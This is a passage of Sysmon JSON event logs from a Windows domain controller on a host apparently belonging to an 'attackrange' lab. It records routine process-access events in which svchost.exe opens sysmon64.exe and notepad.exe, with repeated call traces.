C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 